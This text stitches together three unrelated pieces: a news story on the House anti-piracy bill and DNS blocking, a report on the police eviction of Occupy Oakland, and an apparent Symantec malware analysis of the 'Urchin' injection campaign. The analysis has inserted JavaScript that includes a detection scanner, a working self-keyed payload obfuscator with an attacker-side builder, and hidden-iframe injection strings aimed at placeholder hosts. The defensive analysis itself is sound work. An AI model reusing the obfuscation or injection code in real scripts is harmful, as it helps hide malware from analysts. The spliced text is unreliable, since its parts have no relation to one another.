Feds to Blacklist Piracy Sites Under House Proposal

A bipartisan group of House members introduced legislation Wednesday that would boost the government’s authority to disrupt and shutter websites that hawk or host trademark- and copyright-infringing products, including allowing the government to order sites removed from search engines.

Much of the package is similar to a stalled Senate measure known as the Protect IP Act. Both proposals amount to the holy grail of intellectual-property enforcement that the recording industry, movie studios and their union and guild workforces have been clamoring for since the George W. Bush administration.

Both bills would for the first time allow the Justice Department to obtain court orders requiring American ISPs to stop resolving the domain name of a particular website, which would still leave the site reachable from outside the United States. The House bill also allows the Justice Department to order search engines like Google to remove the allegedly infringing site from their results.

Furthermore, the newest proposal, introduced by House Judiciary Committee Chairman Lamar Smith (R-Texas), grants the U.S. attorney general sweeping powers to block the distribution of workarounds that let users reach sites that have been blacklisted or had their domain names seized, such as the MafiaaFire plugin for the Firefox browser.

Sherwin Siy, a staff attorney with the digital rights group Public Knowledge, said the measure could be interpreted to prevent reporters from writing about DNS workarounds, such as publishing the IP addresses of banned websites. DNS servers translate domain names, such as Wikipedia.org, into IP addresses, but DNS can be bypassed if a user knows the IP address of a site.

“If anybody tells people how they can get around that block, the attorney general can bring an action on them,” Siy said in a telephone interview.

He suggested the government could order news sites to take down stories noting workarounds. “It’s written pretty broadly,” he added of the bill, officially known as the “Stop Online Piracy Act.”

The anti-workaround provisions of the 79-page proposal appear, in part, to be a response to a white paper from leading internet security experts concerned about the fallout if the Justice Department begins ordering American internet service providers to stop handing out the correct DNS entries for infringing websites under the .com, .org and .net domains.

DNS filtering not only causes security problems, it also invites the creation of workarounds, according to the paper written by Steve Crocker of Shinkuro, David Dagon of Georgia Tech, Dan Kaminsky of DKH, Danny McPherson of Verisign and Paul Vixie of Internet Systems Consortium.

Mandated DNS filtering would be minimally effective and would present technical challenges that could frustrate important security initiatives. Additionally, it would promote development of techniques and software that circumvent use of the DNS. These actions would threaten the Domain Name System’s ability to provide universal naming, a primary source of the internet’s value as a single, unified, global communications network.

Moments after the House legislation was introduced, Smith said in a statement that the bill was needed because “Rogue websites that steal and sell American innovations have operated with impunity.”

The United States, however, has already been invoking an asset-forfeiture law to seize the domain names of infringing websites registered under generic top-level domains, under a program called “Operation In Our Sites.” It began last year, and the Department of Homeland Security has targeted more than 128 sites, ranging from sites that link to video streams to those that hawk knock-off paraphernalia.

The House bill, like the Senate bill, allows rights holders to seek court orders requiring online ad services and credit card companies to stop doing business with the infringing sites.

The Smith proposal is set for a hearing Nov. 16 before the House Judiciary Committee, where it is expected to pass before moving to the House floor.

The Senate’s counterpart legislation, however, has been placed on a permanent, procedural hold by Sen. Ron Wyden (D-Oregon). Wyden said the Protect IP Act represents a “threat to our economic future.”

Photo: Richard Winchell/Flickr

Police Evict Occupy Oakland With Tear Gas, Setting Up Wednesday Clash

Police violently evicted Occupy Oakland, one of the more established and extensive of the occupations, on Tuesday, shooting at protestors with projectile rounds and tear gas and drawing national attention.

Over the course of 24 hours, starting with an early morning raid, hundreds of police officers took back control of the square and removed tents.

Police arrested nearly 100 protestors — firing so-called less-lethal rounds into the crowd, and using tear gas to attempt to disperse protestors who tried to return to the square. Protestors also accused the police of using flash-bang grenades and a sound cannon. The Guardian reported that Iraq war vet Scott Olsen is in a local hospital in critical condition with a skull fracture and brain swelling.

Last night, after the bangs had died down and the tear gas had blown away, about a dozen protestors remained. A line of police stood on the other side of a barrier, surrounded by piles of broken glass, unidentifiable debris, a book about Glenn Beck and even a pair of panties, all of which, being on the wrong side of the barricade, had presumably been thrown at the police.

Where I stood, rubber bullets littered the ground, and the intersection’s pavement bore marks where the tear-gas canisters hit.

The protestors I talked to said they had been tear-gassed several times.

Police forces from around the Bay Area participated in the eviction, though Oakland officials have not yet responded to a request to clarify the exact makeup of the force. Across the barrier, I saw an officer in an unfamiliar brown uniform. I tapped my arm in the same spot where the crest was on his uniform, and shouted over the barricade “Where from?” He shouted back “Marin County!” referring to the wealthy county just north of San Francisco. I stopped walking and said “Wow!” He laughed in response, and said, “Me too!”

After the shouting died down, there was some cordial conversation between protestors and Oakland police officers — and protestors even pushed a tray of coffees under the barricades for the officers, though they politely refused.

This evening at 6 p.m., it’s all scheduled to happen again, with a rally and general assembly scheduled to meet at the plaza. Wired will be on the scene.

Photos: Top, Dean Putney/Flickr; Bottom, Quinn Norton/Wired

The True Face of Urchin

In recent days, we have seen blogs about a specific type of mass injection campaign. We take this opportunity to publish our findings in this post.

This particular campaign has already picked up pace and is infecting a lot of innocent users. It all starts with a script that is injected into certain sites. The script itself points to one particular site: “http://[REMOVED]/urchin.js”. Throughout this post we will look at the different exploits this campaign uses to install malicious files onto a compromised computer.

Upon visiting a site with the injected script, the user is redirected to a malicious site. A subsequent redirection takes the user to a site that contains an obfuscated script. When the script is decoded, it reveals an embedded iframe tag. Below is an example of the de-obfuscated iframe tag embedded in the site.
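The redirect chain described above leaves two artefacts that can be keyed on: the injected remote script include and the hidden iframe the decoded stage writes into the page. The scanner below is an added example written for this post, not code from the Symantec write-up or from the campaign. It runs over HTML text (the raw source for the script include; the rendered DOM or the decoded second stage for the iframe, since the campaign writes the iframe from script). The hostnames in the sample page are constructed placeholders; the campaign's real host is redacted in the original.

```javascript
// Added example, not code from the Symantec write-up or the campaign.
// Scans HTML text for the two injection artefacts the post describes.

function findInjectionIndicators(html) {
  var hits = [];
  var m;

  // 1. Remote script include whose path ends in /urchin.js. Note that the
  //    legacy Google Analytics loader was also named urchin.js, so on a real
  //    page the host matters as much as the file name; only the name is keyed
  //    on here because the campaign's host is redacted in the write-up.
  var scriptRe = /<script\b[^>]*\bsrc\s*=\s*["']?([^"'\s>]+)["']?[^>]*>/gi;
  while ((m = scriptRe.exec(html)) !== null) {
    if (/\/urchin\.js(?:\?|$)/i.test(m[1])) {
      hits.push({ kind: 'script', src: m[1] });
    }
  }

  // 2. Iframes sized 0x0 / 1x1 or styled invisible: the decoded stage drops
  //    one of these to pull in the redirector without the visitor noticing.
  var iframeRe = /<iframe\b([^>]*)>/gi;
  while ((m = iframeRe.exec(html)) !== null) {
    var attrs = m[1];
    var srcM = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
    var tiny = /\b(?:width|height)\s*=\s*["']?0*[01]\b/i.test(attrs);
    var invisible = /visibility\s*:\s*hidden|display\s*:\s*none/i.test(attrs);
    if (tiny || invisible) {
      hits.push({ kind: 'iframe', src: srcM ? srcM[1] : null });
    }
  }
  return hits;
}

// Constructed sample: a victim page carrying the injected include plus the
// iframe the second stage would have written. Hosts are placeholders.
var SAMPLE_INJECTED_PAGE = [
  '<html><head><title>Victim site</title>',
  '<script src="/js/jquery.min.js"></script>',
  '<script type="text/javascript" src="http://injected.example.invalid/urchin.js"></script>',
  '</head><body>',
  '<iframe src="http://redirector.example.invalid/i.html" width="1" height="1" style="visibility:hidden"></iframe>',
  '<iframe src="https://video.example.com/embed/abc" width="560" height="315"></iframe>',
  '</body></html>'
].join('\n');

// Constructed clean page for comparison.
var CLEAN_PAGE = '<html><head><script src="/js/app.js"></script></head>' +
                 '<body><p>hello</p></body></html>';

console.log(findInjectionIndicators(SAMPLE_INJECTED_PAGE));
```

The visible 560x315 embed is deliberately left unflagged: a hidden-iframe rule that fires on every iframe is useless on a page that legitimately embeds video.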

The page then presents a video with a play button, which, when clicked on, will display a fake message advising the user to update their Adobe Flash Player as can be seen in the image below.

Even when “Don’t Install” is clicked, the user is still prompted to install the update.

The “i.html” page also stores a multitude of exploits. As an anti-de-obfuscation measure, the script reads its own source text through “arguments.callee” (a property of the arguments object that refers to the currently executing function, not a function in itself) and feeds that text into the decoding routine, a trick we have seen in many malicious scripts: any edit an analyst makes to the script, such as inserting a statement to print the decoded output, changes the text and breaks the decoding. This can be seen in the highlighted section in the image below.
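To make the self-checking trick concrete, here is an added example, not the campaign's code and not from the Symantec write-up: a decoder layer that derives its XOR key from its own source text, the way the i.html stage uses arguments.callee, together with the two ways an analyst deals with it. The key derivation (a 32-bit FNV-1a over the source), the payload and the build step are all constructed for illustration.

```javascript
// Added example, not the campaign's code. A decoder keyed on its own source
// text, as the i.html stage does via arguments.callee, and how to defeat it.

// 32-bit FNV-1a over the source text; stands in for whatever the real script
// computes over itself. Any single-character edit changes the result.
function hashSource(src) {
  var h = 0x811c9dc5;
  for (var i = 0; i < src.length; i++) {
    h ^= src.charCodeAt(i);
    h = Math.imul(h, 0x01000193) >>> 0;
  }
  return h;
}

// XOR a hex-encoded byte string against the four bytes of the hash, repeating.
function xorWithHash(hex, h) {
  var out = '';
  for (var i = 0; i < hex.length; i += 2) {
    var k = (h >>> (8 * ((i / 2) % 4))) & 0xff;
    out += String.fromCharCode(parseInt(hex.substr(i, 2), 16) ^ k);
  }
  return out;
}

// What the malware does: read its own text and key the decode from it.
// Insert a console.log in here to watch the output and the key changes, so the
// payload decodes to garbage. That is the whole point of the trick.
function selfCheckingDecode(hex) {
  var src;
  try {
    src = arguments.callee.toString();
  } catch (e) {
    src = selfCheckingDecode.toString(); // strict-mode fallback, same text
  }
  return xorWithHash(hex, hashSource(src));
}

// Analyst's answer: feed the decoder the original, unmodified source text
// recovered from the page instead of letting it read its edited self.
function decodeWithSource(hex, src) {
  return xorWithHash(hex, hashSource(src));
}

// Assumed attacker-side build step producing a payload this decoder accepts.
function buildPayload(plain) {
  var h = hashSource(selfCheckingDecode.toString());
  var hex = '';
  for (var i = 0; i < plain.length; i++) {
    var k = (h >>> (8 * (i % 4))) & 0xff;
    hex += ('0' + ((plain.charCodeAt(i) ^ k) & 0xff).toString(16)).slice(-2);
  }
  return hex;
}

function demo() {
  // Constructed second-stage payload (placeholder host).
  var plain = 'document.write(\'<iframe src="http://example.invalid/i.html" width=1 height=1></iframe>\')';
  var hex = buildPayload(plain);
  var original = selfCheckingDecode.toString();
  // The edit an analyst would naively make to dump the result:
  var tampered = original.replace('return xorWithHash', 'console.log("dbg"); return xorWithHash');
  return {
    untouched: selfCheckingDecode(hex) === plain,             // decodes
    tamperedSelf: decodeWithSource(hex, tampered) === plain,  // key moved, garbage
    hooked: decodeWithSource(hex, original) === plain         // original text, decodes
  };
}

console.log(demo());
```

The practical lesson is the second path: rather than editing the decoder, hook or copy it and hand it the byte-exact original source (or override Function.prototype.toString to return that text), so the key it derives is the one the attacker built the payload against.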

De-obfuscating this script yields a number of scripts with a pattern identical to the one in the above image. Each of them, when decoded separately, reveals a hidden exploit. Each script also contains a plug-in detection routine that identifies the plug-ins installed on the victim's computer, so that the exploit served can be matched to the installed software. At the time of writing, the site was attempting to exploit the following vulnerabilities:

  • CVE-2010-0842 – Java Midi Vulnerability (BID 39077)
  • CVE-2008-2992 – PDF Util.Printf Vulnerability (BID 32091)
  • CVE-2007-5659 – PDF CollectEmailInfo Vulnerability (BID 27641)
  • CVE-2009-0927 – PDF GetIcon Vulnerability (BID 34169)
  • CVE-2010-0840 – Java Trusted Methods Chaining Remote Code Execution Vulnerability (BID 39065)
  • CVE-2010-4452 – Java Web Start Vulnerability (BID 46388)
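The plug-in detection step and the CVE list above together decide which exploit a visitor receives. The following added example (written for this post, not from the Symantec write-up or the campaign) shows that decision as a version check: given the Java and Adobe Reader version strings a detection script harvests in the browser (the harvesting itself is browser-only and not shown), it lists which of the six CVEs the machine is still exposed to. A defender can run the same logic over a software inventory. The fixed releases in the table are taken from the vendor advisories and are assumptions here, as is the simplified branch handling noted in the comments.

```javascript
// Added example, not from the Symantec write-up. Maps harvested plug-in
// versions to the six CVEs the campaign serves. Fixed builds are assumptions
// from the vendor advisories; branches are listed oldest first.

// "1.6.0_18" or "8.1.2" -> [1, 6, 0, 18] / [8, 1, 2]
function parseVersion(s) {
  return s.split(/[._]/).map(function (p) { return parseInt(p, 10) || 0; });
}

// Negative if a < b, 0 if equal, positive if a > b; short versions pad with 0.
function compareVersions(a, b) {
  var pa = parseVersion(a), pb = parseVersion(b);
  for (var i = 0; i < Math.max(pa.length, pb.length); i++) {
    var d = (pa[i] || 0) - (pb[i] || 0);
    if (d !== 0) return d;
  }
  return 0;
}

var EXPLOIT_TABLE = [
  { cve: 'CVE-2010-0842', plugin: 'java',   fixed: [{ branch: '1.6', version: '1.6.0_19' }] },
  { cve: 'CVE-2010-0840', plugin: 'java',   fixed: [{ branch: '1.6', version: '1.6.0_19' }] },
  { cve: 'CVE-2010-4452', plugin: 'java',   fixed: [{ branch: '1.6', version: '1.6.0_24' }] },
  { cve: 'CVE-2007-5659', plugin: 'reader', fixed: [{ branch: '8', version: '8.1.2' }] },
  { cve: 'CVE-2008-2992', plugin: 'reader', fixed: [{ branch: '8', version: '8.1.3' }] },
  { cve: 'CVE-2009-0927', plugin: 'reader', fixed: [{ branch: '8', version: '8.1.4' },
                                                   { branch: '9', version: '9.1' }] }
];

// Exposed if the version sits in a listed branch below that branch's fix.
// Outside any listed branch: newer branches shipped fixed, older ones are
// treated as unpatched. This is a simplification (Java 5 and Reader 7 had
// their own fixed builds, which this table does not carry).
function isExposed(version, fixed) {
  for (var i = 0; i < fixed.length; i++) {
    if (version.indexOf(fixed[i].branch + '.') === 0) {
      return compareVersions(version, fixed[i].version) < 0;
    }
  }
  return compareVersions(version, fixed[0].version) < 0;
}

// plugins: { java: '1.6.0_18', reader: '8.1.2' }; an absent plug-in is not exposed.
function exposedCves(plugins) {
  return EXPLOIT_TABLE.filter(function (e) {
    return plugins[e.plugin] && isExposed(plugins[e.plugin], e.fixed);
  }).map(function (e) { return e.cve; });
}

// Java 6u18 with Reader 8.1.2: everything except CVE-2007-5659 still applies.
console.log(exposedCves({ java: '1.6.0_18', reader: '8.1.2' }));
```

Run against the fleet, the output is the patch list that takes this campaign's exploit kit off the table; against a single browser it is exactly the branch the attacker's detection script takes before choosing which JAR or PDF to serve.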

Below is a snapshot of a decoded version of the Java Midi exploit (CVE-2010-0842).

The malicious RMF file required to trigger the vulnerability is obfuscated and passed to the JAR file at runtime as an array embedded in the HTML. The malicious JavaScript inside the PDF uses a similar template for obfuscating the script. De-obfuscating it reveals the exploits included within it; the highlighted section in the following image shows the different exploits.

Regardless of whether the user manually installs the malware from the fake Adobe Flash Player update screen, the malware will be installed if any of the aforementioned vulnerabilities is successfully exploited. Hence the chances of the malware being installed on the computer are significantly increased.

Ultimately, whether one of the vulnerabilities is exploited or the user manually clicks the “Install Now” button shown in the image below, the FakeAV downloader is installed.

Below is a snapshot of the FakeAV scanner that prompts the user to run the FakeAV downloader, which actually downloads the FakeAV.

Consequently, there is not a single method by which the computer can become compromised, but several. This is another typical scenario that blends social engineering with the exploitation of various vulnerabilities to get the malware installed.

Symantec’s multi-layered approach protects its users from these types of attacks. However, we do urge users to keep both their security software and their various plug-ins up to date in order to thwart these attacks.